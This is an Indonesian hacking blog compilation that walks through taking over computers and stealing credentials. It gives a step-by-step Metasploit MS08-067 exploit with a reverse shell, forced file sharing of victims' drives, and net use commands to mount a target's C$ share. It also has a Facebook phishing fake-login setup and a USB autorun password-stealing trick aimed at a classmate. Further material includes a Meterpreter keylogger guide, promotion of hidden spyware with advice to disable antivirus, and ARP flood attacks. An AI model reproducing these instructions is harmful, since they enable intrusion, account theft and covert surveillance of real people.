Mengambil alih komputer target dalam jaringan

Tanpa banyak bacot dari ane lagi,silahkan anda baca judul diatas,kali ini teknik yang kita gunakan yaitu teknik Remote Exploit. Dan Yang perlu kamu siapkan pada sesi kali ini yaitu:

• Metasploit Framework 3.2 For Windows, dapat kamu download disini: http://www.metasploit.org/framework/download/?id=framework-3.2.exe
• Komputer target yang menggunakan OS Win XP SP2, SP3, Win2003, atau WinVista. (gue menggunakan Windows XP SP2).
• - Alamat IP Address Target.

Jika diatas telah terpenuhi, sekarang kamu jalankan Program Metasploit 3.2, tepatnya kamu pilih Metasploit 3 Web (lihat gambar).

Tunggu beberapa saat,(sabar yach) Setelah itu akan tampil seperti gambar dibawah ini:

Jika udah tampil loe pilih menu Console. Maka akan tampil jendela seperti berikut:

Ketikkan perintah show exploits kemudian tekan Enter

Maka akan tampil Modul exploit seperti beirkut:

Kemudian pilih modul exploit untuk kelemahan pada Netapi32, caranya dengan mengetikkan :

use windows/smb/ms08_067_netapi kemudian Enter

Kemudian pilih jenis payload. Kali ini kita pilih payload yang akan menghubungkan shell komputer target dengan komputer penyerang melalui TCP. Caranya dengan mengetikkan perintah:

set payload windows/shell/reverse_tcp (kemudian Enter)

Kemudian masukkan IP Address kamu, dengan cara mengetikkan perintah :
set LHOST 192.168.0.17 Enter <----- Contoh dengan IP gue.

Kemudian masukkan IP Address target kamu, dengan cara mengetikkan perintah :
set RHOST 192.168.0.16 Enter <----- Contoh dengan Target gue.

Semuanya udah siap…? Siap…!!! Ready!!! 1….2….3… tunggu dulu bro, ketik dulu instruksi/perintah exploit kemudian tekan Enter.

Tedennnnggggg!!! Abrakadabra!!!, sistem target telah diambil alih

Sekarang kita telah berada di direktori c:\windows\system32 sang target. Akses penuh telah ditangan. Selanjutnya tinggal kreatifitas kalian. Untuk mengintip data pada komputer target, silahkan jalankan perintah MS DOS. Sebagai contoh, kita akan menuju drive “D” korban, dengan mengetikkan perintah >> d: Enter. Kemudian lakukan perintah DIR untuk melihat isi data drive D komputer korban.

Untuk mengambil data pada komputer korban, kita akan melakukan sharing paksa dari komputer korban dengan menjalankan perintah.

net share namafolder=d:\lokasifolder /UNLIMITED kemudian enter. Lihat gambar dibawah ini:

Kemudian masuk pada windows Explorer, lalu ketikkan pada Address Bar \\Alamat IP target\namafolder yang telah dishare paksa. Contoh:

  ada dua kemungkinan yg bisa muncul,berhasil dan...gagal...coba2 aja...mungkin berhasil...ingat klw berhasil dosa anda tanggung sendiri,saya tidak bertanggung jawab,isi blog ini full hanya untuk edukasi.

Apa itu keylogger ??

Keylogger merupakan sebuah perangkat baik perangkat keras atau perangkat lunak yang digunakan untuk memantau penekanan tombol keyboard. Sebuah keylogger biasanya akan menyimpan hasil pemantauan penekanan tombol keyboard tersebut ke dalam sebuah berkas log/catatan/rekaman. Beberapa keylogger tertentu bahkan dapat mengirimkan hasil rekamannya ke e-mail tertentu secara periodik.


Keylogger dapat digunakan untuk kepentingan yang baik atau bahkan bisa digunakan untuk kepentingan yang jahat. Kepentingan yang baik antara lain untuk memantau produktivitas karyawan, untuk penegakan hukum dan pencarian bukti kejahatan. Kepentingan yang buruk antara lain pencurian data dan password.


Key logger banyak dipasang oleh hacker di warnet dan di tempat – tempat umum lainnya,
Sang hacker akan menginstal keylogger kedalam computer sehingga semua kegiatan dalam computer itu akan dicata dan dilaporkan ke email sang hacker, bahkan semua email dan password kita akan tercatat dalam laporan tersebut,

Ada beberapa pertanyaan yang sering muncul tentang perangkat lunak ini seperti :

Apa adalah perangkat lunak mata-mata?
Spy perangkat lunak adalah istilah umum untuk berbagai jenis program yang dirancang untuk memantau aktivitas pengguna pada komputer tertentu. Beberapa program dapat mengirim dikumpulkan data ke komputer lain melalui e-mail atau koneksi jaringan, lainnya hanya menulis ke file tersembunyi pada komputer yang sama.

Apakah ada perbedaan antara perangkat lunak mata-mata dan pemantauan perangkat lunak komputer?

IBoth nama-nama ini dapat digunakan untuk menggambarkan jenis program yang sama. Tetapi beberapa orang mengatakan bahwa perbedaan itu terletak pada kenyataan bahwa perangkat lunak mata-mata bekerja tanpa deteksi dan program kegiatan monitoring komputer memperingatkan pengguna bahwa aktivitasnya dimonitor. Tetapi perbatasan antara kedua jenis perangkat lunak yang sangat samar-samar.

Adalah perangkat lunak mata-mata ilegal?

Tidak, tidak ada ilegal tentang perangkat lunak mata-mata itu sendiri. Sebagian besar pengembang adalah orang-orang yang taat hukum mereka yang membuat program khusus untuk tujuan yang sah. Ada banyak situasi ketika memantau aktivitas komputer secara sempurna hukum: orang tua dapat menggunakan tombol penebang untuk melindungi anak-anak mereka dari pelecehan online, perusahaan dapat menggunakan perangkat lunak Internet pemantauan untuk memastikan bahwa karyawan mereka tidak menyalahgunakan koneksi internet perusahaan dan sebagainya. Tentu saja beberapa orang dapat menggunakan perangkat lunak yang sama untuk mencuri password, nomor kartu kredit atau rahasia perusahaan. Namun, bahkan dalam situasi ini bukan perangkat lunak yang melanggar hukum, tetapi orang yang menggunakannya. Ada juga menggunakan yang tidak sepenuhnya ilegal, namun memiliki beberapa ambiguitas moral kepada mereka (misalnya, sebuah monitor aktivitas komputer dapat digunakan untuk menangkap dalam tindakan pasangan kecurangan).

Apakah saya melanggar hukum apapun dengan menggunakan monitor komputer aktivitas?

Tergantung pada cara Anda menggunakannya. Dalam kebanyakan kasus, Anda memiliki hak untuk menginstal program apapun pada komputer milik Anda. Anda juga memiliki hak untuk menginstal program pada komputer orang lain jika Anda punya izin mereka. Instalasi program monitoring pada komputer orang lain tanpa nya / izin melanggar hukum. Kami tidak akan mencoba untuk memberikan saran pada sisi hukum kegiatan pemantauan komputer karena semuanya tergantung pada situasi tertentu Anda. Jika Anda ragu, konsultasikan dengan pengacara Anda.

Dapat digunakan perangkat lunak mata-mata untuk tujuan yang sah?

# Ya, tentu. Berikut adalah beberapa contoh sempurna menggunakan hukum alat monitor komputer kegiatan. Anda dapat: Monitor aktivitas online anak-anak Anda untuk memastikan mereka tidak mengunjungi situs web porno atau tidak membuat kenalan meragukan.
# Pastikan tidak ada yang mengakses file pribadi Anda saat Anda jauh dari komputer.
# Lacak aktivitas pengguna berpengalaman 'untuk cepat menemukan masalah jika mereka merusak file sistem.
# Aktivitas komputer Monitor karyawan Anda untuk memastikan mereka benar-benar bekerja dan tidak melakukan apa pun yang mungkin menjadi sumber masalah hukum untuk Anda.
# Cari tahu apakah seseorang menggunakan komputer Anda selama Anda pergi.

Apa jenis aktivitas komputer dapat memantau perangkat lunak mata-mata?

Hampir semua. Hal ini dapat merekam keystrokes, membuat serangkaian screenshot, merekam suara, melacak mengunjungi situs Web dan meluncurkan program-program, membuat salinan email yang dikirim dan diterima, monitor yang film dan file suara diputar pada sistem, menyimpan file yang dibuka dan dilihat dan banyak lagi. Ada adalah program Swiss Army Knife-gaya mampu melakukan sebagian besar tugas-tugas dan ada alat yang lebih khusus yang memantau hanya jenis tertentu kegiatan komputer (misalnya penebang kunci yang digunakan untuk merekam semua tombol ditekan oleh pengguna).

Apakah saya memerlukan akses fisik ke komputer saya ingin menginstal sebuah memonitor aktivitas komputer?

Dalam kebanyakan kasus Anda perlu. Ada beberapa program yang bertindak agak seperti kuda Troya, namun sebagian besar alat monitor komputer kegiatan tidak dapat diinstal tanpa akses fisik ke komputer.

Pengguna dapat mengetahui bahwa ia sedang dipantau?

Hampir semua monitor komputer bekerja dalam modus diam-diam. Mereka tidak terlihat di daftar tugas, mereka tidak muncul dalam registri dan tidak ditampilkan di daerah startup standar. Bahkan pengguna yang sangat berpengalaman tidak akan dapat mendeteksi mereka, kecuali jika ia menggunakan perangkat lunak pendeteksi khusus.

Dan software key logger saat ini dapat dengan mudah di download di berbagai situs atau abnda denganmudah bisa menemukannya dengan mengetikankata kunci “ keylogger download “ pada mesin poencari sejenis google

dan salah satu software keylogger tercanggih adalah

PCPANDORA :

PC Pandora merupakan software keylogger yang dapat digunakan untuk mencatat aktivitas dalam penggunaan komputer mulai dari mencatat email-email yang dikirimkan, program-program yang dijalankan, aktivitas chatting dengan instant messenger, website-website yang dikunjungi, catatan penggunaan file (file tracking), aktivitas peer to peer (P2P), aktivitas pencarian melalui search engine, aktivitas user, penggunaan webcam, dan juga ketukan-ketukan keyboard (keystroke) yang dilakukan pada berbagai program, Selain itu, PC Pandora juga dapat digunakan untuk mengambil tangkapan layar (screeshot) setiap jangka waktu yang ditentukan. Pencatatan berbagai aktivitas tersebut dapat diatur agar pengguna pun tidak mengetahuinya.
Disamping sebagai keylogger program untuk merekam aktivitas pengguna komputer, PC Pandora juga dilengkapi fasilitas untuk memblokir program-program mana yang tidak boleh digunakan, alamat website mana yang tidak boleh diakses, dan juga aplikasi-aplikasi chatting dan instant messenger mana yang akan diblok penggunaannya.
Semua catatan aktivitas dan pengaturan tersebut nantinya akan dapat dilihat oleh administrator komputer yang sebelumnya melakukan instalasi PC Pandora dengan menggunakan shortcut key atau tombol kombinasi yang telah diatur serta password yang diset pada saat instalasi. Untuk hasil pencatan aktivitas, dapat pula diatur agar secara otomatis dikirimkan ke alamat email yang ditentukan.
Dari sisi kebaikan program keylogger semacam ini, mungkin saja dimanfaatkan dalam rangka mengontrol dan mengawasi penggunaan komputer, seperti untuk orang tua terhadap putra-putrinya, para pendidik terhadap anak didiknya, atau pemilik perusahaan terhadap karywan-karyawannya dalam hal penggunaan komputer. Tentu saja, software semacam ini pun akan mudah disalahgunakan untuk keperluan iseng maupun untuk tujuan tidak baik.
Untuk mendapatkann keylogger ini anda bisa mendownloadnya di www.pcpandora.com
Perlu diketahui pula, ada kemungkinan file setup PC Pandora akan diidentifikasi oleh program antivirus atau antispyware sebagai spyware. Untuk Symantec Antivirus misalnya, akan mendeteksinya sebagai spyware.PCPadora. Hal ini umum terjadi pada berbagai antivirus terhadap software keylogger karena dalam penggunaannya umum digunakan untuk memata-matai. Untuk melakukan instalasi, Anda dapat menonaktifkan antivirus terlebih dahulu atau memasukan PC Pandora dalam pengecualian.

Cara download cepat di 4shared

kebanyakan file yg kita cari ada di 4shared,bener gak ? yaa kayak gudang file gituu hehee.. tapi harap maklum karna biasanya kita pake yg free alias gratis bukan premium dr akun 4shared maka dipastikan download nya juga gak sehebat ataupun sedahsyat yg pake akun premium alias berbayar.. nah gini gue dpt nice info dari kaskus.. mumpung gue baik,gue share dehh di blog sederhana gue kali ini.. :))

Langkah - langkahnya :

1. Cari file yang ingin di download, contoh :

Code:

http://www.4*shared.com/file/102961869/656728ed/500_hacking_tutorials.html

2. Masuk ke link berikut

Code:

http://file2hd.com

3. Masukkan download link agan, jangan lupa centang "terms of services" kemudian klik "get files"

4. Setelah itu akan muncul hasil dibawahnya, cari link berikut :

Code:

http://dc146.4*shared.com/download/6qdeu0ok/500_hacking_tutorials.rar?tsid=20111223-074342-f904b0e2

nah cari link yang bertuliskan /download/
klik link tersebut dan rasakan hasilnya

Kumpulan Trik untuk Meningkatkan Kecepatan Koneksi Internet

Untuk bagian pertama, yaitu meningkatkan kecepatan koneksi internet tanpa bantuan software bisa kita lakukan dengan cara:

• Menyembunyikan image dan gambar animasi pada browser Firefox.
• Memodifikasi registry editor Windows.
• Memodifikasi about:confiq browser Firefox.
• Merubah seting proxy menggunakan Toonel.net.
• Menonaktifkan Network Protocol.
• Modifikasi QOS Packet Scheduler Windows.
• Modifikasi MTU Windows.

Sedangkan bagian kedua, kita bisa memanfaatkan bantuan software:

• SpeedConnect Accelerator.
• FullSpeed.
• SG TCP Optimizer.
• TCPSpeed.
• Modem Booster.
• Speedyfox, addons browser Firefox.
• Internet Speed Booster.
• Internet Cell Boost Lite.
• Connection Booster.
• NETEagle.
• Firetune, untuk browser Firefox.
• Tweak Network Settings, addons browser Firefox.
• Optinet.
• Flash & Picture Switcher, addons browser IE.
• DnsSpeeder.
• FlashBlock, addons browser Google Chrome.
• Turbo Internet Booster.
• Fasterfox, addons browser Firefox.
• Ashampoo Internet Accelerator 2.
• NoScript, addons browser Firefox.
• CyberTweak.

Trik-trik tersebut di atas bisa digunakan untuk semua koneksi internet, baik itu koneksi dengan modem usb, modem ponsel, atau modem lainnya, baik itu CDMA dan GSM seperti Smart Flexi, Fren, Flash, Broom, atau koneksi dari operator lainnya.

Yang harus diperhatikan di sini adalah bahwa trik-trik di atas lebih fokus kepada mengelola bandwidth yang masuk ke komputer kita melalui optimalisasi sistem Windows, browser, atau modem yang digunakan, jadi untuk besaran bandwidth yang masuk (diterima), kita tidak bisa mengaturnya karena itu ditentukan oleh ISP yang bersangkutan.

Menambah Bandwidth Internet di Windows

Memiliki koneksi internet yang cepat memang menjadi dambaan setiap orang, tapi bagaimana bila koneksi yang kita gunakan kecepatannya cuma paspasan ?
Untuk yang enggan menggunakan software untuk mendongkrak kecepatan koneksi internet yang paspasan, bisa melakukannya sendiri dengan mudah dan peningkatan kecepatannya juga akan terasa.
Pada dasarnya komputer windows sudah membatasi bandwidth koneksi internet sebanyak 20% dari total bandwidth yang seharusnya secara otomatis, jadi kalau ingin menambah bandwidth internet supaya koneksinya terasa lebih cepat bisa dengan cara mengurangi atau mengosongkan batasan bandwidth tsb.
• Caranya lakukan setting seperti cara dibawah ini:
1. Klik Start
2. Klik Run
3. Ketik gpedit.msc
4. kemudian klik Ok
5. Setelah masuk klik Administrative Templates
6. kemudian Klik Network
7. setelah terbuka klik QoS Packet scheduler
8. kemudian klik Limit Reservable Bandwidth
9. Dan setelah terbuka ubah setting menjadi Enable
10. Kemudian ubah Bandwidth Limitnya menjadi 0
11. Klik Apply,ok
12. Kemudian keluar dan Restart komputer

Remote Komputer dengan CMD [ Command Prompt ]

Salah satu senjata terampuh para Hacker adalah Command Prompt, percaya tidak percaya tool bawaan windows ini bisa sama gunanya sama Remote Executor, FTP Manager, dll. tetapi bedanya ini berbasis CUI (Code User Interface) kalo Remote Executor, FTP Manager kebanyakan berbasis GUI (Graphical User Interface) yang semudah klak-klik-klak-klik dll.

Dalam tulisan ini saya akan memberi tutorial meremote komputer orang lain dengan Command Prompt.
Persyaratanya adalah :

1. Pc Kita & Pc target sama-sama sedang connect internet
2. Pc Kita & Pc target sama-sama menggunakan OS Windows


Tentukan IP target mu,Dan Mulai jalankan CMD dengan cara :
Start ====> RUN ===> CMD
Kemudian ketikan perintah dibawah ini :

cd c:\  [enter]

C:\>net use \\ip_target [enter]
kalo ada keterangan
the command completly succesfully, lanjut...

C:\>net use K: \\ip_target\c$ [enter]
kalo ada keterangan
the command completly succesfully, lanjut...

Seperti Gambar Di bawah ini

 

Setelah Sukses Langsung Buka My Computer anda

maka akan terlihat drive K disanalah Drive C target berada
Jika ingin meremot Drive D  cukup mengganti kode net use K: \\ip_target\c$ menjadi net use K: \\ip_target\d$

Nah Bereskan... Berikut saya berika Screenshootnya

Cara Hack Facebook Dengan Metode Fake Login / Phising / Scam

PERTAMA:

Cara ini paling banyak digunakan dan terbukti efektif untuk meng-hack facebook, sebenarnya metodenya simple saja, kita tinggal membuat halaman login palsu yang kemudian kita upload ke sebuah website bahkan website gratisan pun bisa, kemudian kita pancing pengguna facebook agar menuju halaman login facebook palsu tersebut, cara memancing pengguna facebook pun ber macam macam bisa lewat email palsu yang mengatasnamakan facebook, link login palsu dan metode social engineering lainnya. Cara mencegah hack facebook dengan metode ini : sebelum anda login atau memasukkan username dan password anda pastikan bahwa alamat url tersebut benar, jika anda tidak yakin buka saja sebuah jendela baru, masukan alamat facebook (http://www.facebook.com) dan login melalui jendela tersebut. pastikan keaslian email yang mengatasnamakan facebook yang memancing anda agar login facebook yang masuk ke inbox anda, atau abaikan saja email tersebut.

KEDUA:

Facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun.
hampir-hampir saja facebook diharamkan.

Sesudah saya posting tentang cara login palsu di friendster, hari ini saya posting tentang cara membuat login palsu di facebook.

1. silahkan anda daftar di http://www.700megs.com
mengapa saya suruh anda daftar disana ?
di web hosting sana sangat gratis dan support php juga dari pada di ripway.com
bila tidak bisa terdaftar langsung saja masuk di :
http://www.700megs.com/register.jsp

2. setelah anda berhasil mendaftar di 700megs.com masuk ke FILE MANAGER…hapus file index.html.(akan ada di Cpanel masing2 nantinya)

3. oke, kita mulai praktek kita.
yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
silahkan download scriptnya dahulu disini atau di
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
ukuran cuma 9kb.

4. setelah anda download. Disana ada dua file sebut saja index dan write
kedua-duanya silahkan anda upload di 700megs.com yang tadi anda sudah daftar.

5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]

6, alright! selesai sampai di sini. . .

untuk penyebarannya silahkan dengan cara masing2…

disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania..
buka file index di www.700megs.com kalian..ambil URL nya.. [penting]

terus untuk pengguna firefox: buka tools>option>main

preview:

disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
boleh di sebar ke komputer temen/di warnet2 kesayangan.

atau..

bisa juga menyebarkan dengan cara seperti ini

kamu buat account baru,di yahoo,gmail,ato sejenisnya

dengan nick Facebook@ or something like that.

diatas cm contoh…silahkan kamu buat seni sendiri
enjoy..

mudahkan ??

semoga berhasil . . ..

KETIGA:

Yang paling penting siapin dulu web hosting buat naruh file fake login bisa yang gratis atau bayar terserah kalian pilih yg mana.,.,.,.,.,.,

1. download dan extract file index.html download dulu disini
2. download dan extract file logs.php download dulu disini
3. download dan extract file log.txt download dulu disini

Password : Flow

dah disiapin belum web hostingnya? ql belum aku saran mending pakek ripway.

nah kalau sudah registrasi, kalian upload dech file file yang kalian extract tadi.,.,.,.,.

pengertian:
- index.html : Halaman utama login palsu, alamat ini yang kalian sebar ke target.
Ex: http://h1.ripway.com/nama_kalian/index.html
- logs.php : Berfungsi untuk mengirimkam hasil hack dari index.html ke logs.txt
- logs.txt : Berfungsi untuk menampung hasil jerih payah kita
Ex: Email + Password Facebook.

sebarin dech alamat Fake Login kita tadi (index.html),.,.,.,
tinggal tunggu orang yang terlalu ceroboh login pakek Fake login kita.

saran bagi facebook’er :

1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com

2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.

3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’

4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.

5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. bila terlanjur cepat ganti password kalian,.,.,.,.

Curi Password Orang Lain (hanya) dengan Flashdisk..

.saya akan membahas tentang cara mencurio password orang lain dgn hanya bermodalkan cinta...eh?? flashdisk maskud saya...Langsung aja:
sering nemuin box dialog kayak gini kan?

mungkin klo kita ngenetnya di warnet/tempat umum biasanya yang dipilih not now atau never for this site. tetapi bagaimana kalau ngenet di komputer/laptop pribadi??
sebagian besar orang akan memilih remember agar gak repot masukin password klo masuk ke situs tersebut.
dan inilah celah yang akan kita manfaatkan
gw ada program kecil yang gw temuin di internet. fungsinya sederhana banget. ketika program ini dijalankan maka semua password yang kesimpan di browser baik IE, Firefox, Email Client bahkan YM pun bisa dicuri (kecil2 cabe rawit nih )

download softwarenya disini

nah apa hubungannya dengan flashdisk?
sebaiknya ente download dulu dan extract filenya

setelah diextract ada 8 file antara lain readme, launch.bat, passwordfox dll. Sebenarnya kita bisa pilih mau curi password apa, klo firefox tinggal buka passwordfox, kalo YM tinggal buka mspass. tapi disinilah betapa powerfullnya ni program. ada 1 file namanya launch.bat. jika file ini dijalankan. maka semua program tadi akan berjalan secara otomatis di background, dan hasil colongan passwordnya akan diexport ke file txt. How Awesome!! right?
ada 1 file lagi yang mumpuni, namanya autorun.inf.. jadi setiap kita nyolokin flashdisk yang berisi program ini. secara otomatis launch.bat akan berjalan tanpa kita suruh . tapi sayangnya file autorun.inf sering menjadi sarang penyebaran virus. sehingga dihapus oleh Antivirus, apalagi sama SMADAV. langsung dibante tuh file fiuhh….
sekarang masuk ke ceritanya. misal ente punya cewek incaran di kampus, Namanya Lala. orangnya pinter dan kebetulan 1 kelas .
GwGantengBanget : “Eh la, udah ngerjain tugas pemrograman web??”
Lala : “udah mang napa?”
GwGantengBanget : “minta source codenya dong hehe”
Lala : “Ya elah, tuh copy sendiri di laptop gw”

Bingoo!!
Sembari ngopy jangan lupa jalanin launch.bat tadi

GwGantengBanget : “udah la, makasih banget ya “
tinggal sekarang lo panen password.. hueheueheue







N.B:bagi sobat yg udah baca posting saya sebelumnya:

Inilah cara termudah dan tergampang mendapatkan 1.000.000 pengunjung blog gratis

jgn heran ya ama penggunaan bahasa yang sering berubah rubah,(maklum,penulis aga gokil...)

Net Control.. Software sniffing via LAN

Mengambil alih computer lain dengan Net Control

---

Net Control Program ini berguna untuk melakukan remote (take control) pada computer lain. Termasuk pengambilan fungsi keyboard dan mouse dan komputer client sebagai induk dapat menjalankan dan mengendalikan computer di bagian server (disebut computer yang sedang dikendalikan / Remote Computer).

Fungsi fungsi program termasuk lumayan lengkap dan dapat melakukan remote di beberapa computer dengan satu buah computer induk atau client. Computer yang mengatur disebut sebagai client sedangkan computer yang akan diatur atau dikendalikan disebut sebagai server. Computer client adalah computer induk dimana dapat melihat kegiatan computer lain.

Untuk membahas NetControl computer dibagi menjadi 2 :

• Computer Client atau yang akan mengendalikan computer lain
• Computer Server atau computer host atau computer yang akan dikendalikan oleh computer lain

Untuk tahap awal, Program Net Control harus di install pada sisi client dan server. Program Net Control juga dapat mengaktifkan kedua fungsi pada 1 buah program. Untuk mengetahui apakah ada computer yang aktif mengunakan sesi Server untuk di kontrol, ketika program bekerja cukup di clik pada bagian fungsi search dengan gambar kaca pembesar (Magnifier) atau pemakai juga dapat memasukan nama IP dari masing masing computer yang akan diambil alih. Disisi server yang akan dikendalikan juga dapat dimasukan IP computer siapa saja yang dapat masuk untuk mengambil alih computer server.

Apa saja fungsi yang ada pada program Net Control. Fungsi dari program ini sendiri adalah mengambil alih computer lain pada suatu jaringan network (LAN). Computer client atau induk computer dapat melihat kegiatan computer lain pada layar monitor computer induk. Fungsi ini disebut WinVNC, dimana layar computer yang menjadi server dapat ditampil pada computer client. Dan tidak itu saja, computer client juga dapat melakukan control seperti membuka atau menutup aplikasi dari computer server. Pada gambar dibawah ini adalah contoh ketika 2 buah computer mengunakan software Net Control. Monitor kiri adalah computer server yang dikendalikan oleh komputer disebelah kanan. Pada computer gambar kanan, dapat memperlihatkan gambar layar monitor pada computer kiri. Fungsi keyboard pada monitor dan mouse di komputer server dan client dapat berjalan bersamaan.

Fungsi program lainnya, Net Control di computer client yang sedang melihat computer layar monitor computer server dapat juga mengirim gambar ke computer server, sehingga pemakai pada computer server dapat mengetahui bahwa computer tersebut dalam status dikendalikan oleh computer lain yaitu computer client.

Untuk fungsi pengendalian dari program Net Control sangat banyak. Fungsi File manager, fungsi ini adalah membuka file manager untuk mengcopy, rename atau menjalankan program pada computer server yang sedang dikendalikan. Tidak itu saja, pada Net Control, semua file pada directory dapat diremote oleh computer client sebagai computer induk tanpa ijin pemilik computer server untuk melakukan sharing file, karena Net Control menganggap otorisasi sudah diberikan secara langsung untuk mengaccess seluruh isi harddisk atau storage lainnya. Fungsi ini berguna untuk melakukan backup data pada computer lain.

Atau untuk saling chat antar computer didalam sebuah jaringan computer, bahkan dapat computer client dapat memberikan pesan penuh pada layar computer server. Bahkan Net Control dapat mengirim pesan secara penuh pada layar computer, yah mungkin saja teman anda akan sulit membaca text kecil dan dengan memberikan pesan dengan gambar penuh akan teman anda akan lebih memperhatikan.

Yang menarik, computer server dapat dikunci untuk fungsi mouse dan keyboard melalui computer client yang sedang mengambil alih Lalu apakah di sisi server yang akan dikendalikan tidak memiliki pengaman

Untuk mengunci komputer lain, pemakai computer server juga harus memberikan otorisasi penuh ke IP atau computer client yang ada. Di sisi server juga dapat ditempatkan password sebagai pengaman, juga bila pemakai pada computer server, maka program dapat dimatikan sistem pengendaliannya. Atau membatasi computer siapa saja yang dapat mengambil alih , bila perlu program Net Control dapat mengawasi dari dari pihak client agar memberikan pesan dahulu sebelum computer lain ingin mengambil alih. Fungsi pengaman ini dapat dilakukan oleh fungsi setup agar pemakai di computer server mengetahui apakah computer lain masuk untuk mengambil alih atau Net Control tidak langsung di load ketika computer melakukan boot.

Menariknya Client computer dapat mengaccess beberapa computer lainnya, jadi tidak hanya 1 buah computer yang dapat di kontrol melainkan dapat mengambil alih serta memantau dari beberapa computer lainnya dengan satu buah client computer. Untuk capture screen atau virtual desktop dengan fungsi WinVNC sendiri akan mengambil bandwidth dari sebuah network , karena gambar secara realtime di tranfer ketika computer server dikendalikan. Bila membuka layar monitor dari computer server sebaiknya tidak terlalu banyak karena cara ini akan memakan trafik pada LAN.

Pemanfaatan program ini sangat berguna bagi para IT dimana harus mengatur atau memantau beberapa computer. Mungkin saja disuatu area kerja dengan banyaknya computer bisa saja seseorang lupa mematikan computer, dan petugas IT dapat mematikan dari jauh dengan melihat dan memberikan pesan. "mas computer udah enga dipake yah, aku mau pulang nih dan jam 12 malem dimatikan semua" dan blep computer dimatikan dari tempat kerja bagian IT tepat pada jam 12 ketika petugas mengaktifkan shutdown all dari program Net Control.

www.netcontrol2.com

Cara Mengendalikan dan Hack komputer lain (SNIFFING)

Peralatannya adalah :

Angry IP Scanner (Buat scanning ipaddress) >>> "DOWNLOAD"

Nmap (Buat nyecan Port2 yg kebuka n nyecen OS korban sekalian) >>> "DOWNLOAD"

Metasploit (Sangat penting buat exploitnya) >>> "DOWNLOAD"

Spoiler for Tutorial:

• 1. Pertama buka angryipscanner, pilih netmasknya yg 24 ajee,,pokoknya disesuain aja sama lokasinya dimana,,hahhaha,,kalo sekedar hostpot area area doang yg model model kayak di mol mol mah 24 ..lalu liat ipaddress kita dilaptop kita..dan lakukan scanning dari 0 s/d 255, maka akan muncul gambar kayak gini :

Spoiler for pick:

nah gambar diatas itu yg warna biru berati komputernya lagi idup alias lagi nyala.

• 2. Buka nmap dan lakukan scanning port dan OS korban dengan perintah sudo nmap -O ipkorban, seperti gambar berikut:

ternyata pake windows XP,, sampe keakar2nya bikin install ulang dalem hitungan detik...kan ini tutorialnya tentang ngerekam keyboard buat dapetin password,,

• 3. Mulailah exploit, buka applikasinya msfgui,,tekan keyboard Alt+F2 dan ketik ?msfgui? setelah kebuka dan Start, pilih ?ms08_067_netapi? di Exploit>windows>smb> , seperti gambar berikut ini:

• 4. Maka akan keluar jendela pilihan OS targetnya, pilihlah ?Automatic Targeting?, seperti gambar berikut ini:

Spoiler for pick:

• 5. Lalu scrool kebawah dan pilih ?Meterpreter>bind_tcp? , seperti gambar berikut ini:

Spoiler for pick:

• 6. Lalu scrool kebawah lagi dan masukan ipaddress target di kolom ?RHOST? , seperti gambar berikut ini:

Spoiler for pick:

Lalu scrool ke paling bawah ada tombol, Exploit, tekan aja ituh,,,

• 7. Maka akan keluar jendela seperti ini di tab ?Session?, seperti gambar dibawah ini:

Spoiler for pick:

• 8. Lalu klik kanan itu dan pilih Monitor>Start KeyLogger, seperti gambar dibawah ini:

Spoiler for pick:

• 9. Maka akan keluar path tempat penyimpanan log nya berupa format ?txt? dikomputer kita, seperti gambar berikut ini:

Spoiler for pick:

coba perhatikan yg Keystrokes being saved to bla bla bla,,itu adalah nama path lokasi penyimpanan lognya dikomputer pinguin kita. dan liat bacaan Recording,,itu berati ketukan keyboard korban sudah mulai di rekam oleh metasploit kita..hhehehe..Saatnya kita tungguin ajaaa dah,,setelah lama, kita tunggu, n udah gak sabar, setelah beberapa menit kita buka ajjeee tuh filenya, seperti gambar berikut ini:

Spoiler for pick:

• 10. Udah gak sabar nih, langsung aja buka,,lalu lakukan searching dengan menekan tombol Ctrl+F dengan memasukkan kata2 kunci yg biasanya bau bau enak, seperti yahoo.com, yahoo.co.id, gmail.com , ymail.com, com, dll, maka akan keluar Insya Allah kayak gini broo:

Spoiler for pick:

Win Arp Attacker – Simple but Dangerous

Win Arp Attacker adalah salah satu networking tool yang memiliki banyak fungsi yang dapat digunakan untuk sniffing, spoofing dan attacking pada jaringan. Hampir sama dengan wireshark, tetapi pengoperasiannya lebih mudah dan dengan penjelasan yang saya berikan tersebut, mungkin bagi pemula sekalipun dapat menggunakannya.

Feature dan Penjelasan:

1 Scan

Melakukan scaning dan menunjukan host yg aktif dalam waktu yang singkat (2-3 detik).
Fungsi scan ini memiliki 2 mode, yaitu scan secara normal dan anti sniff scan untuk mencari siapa dan adakah yg melakukan sniffing pada jaringan kita. Selain itu, Kita dapat menyimpan dan meload komputer list yang berada pada jaringan.

2. Attack
Fungsi ini menangkap dan mengumpulkan seluruh paket dalam jaringan. Selain itu, fungsi utamanya memiliki 6 opsi:
(1) Arp Flood yaitu mengirim dan melakukan ip conflict paket ke komputer target, yang dapat membuat komputer target down dan lumpuh jika kita terlalu banyak mengirim paket.
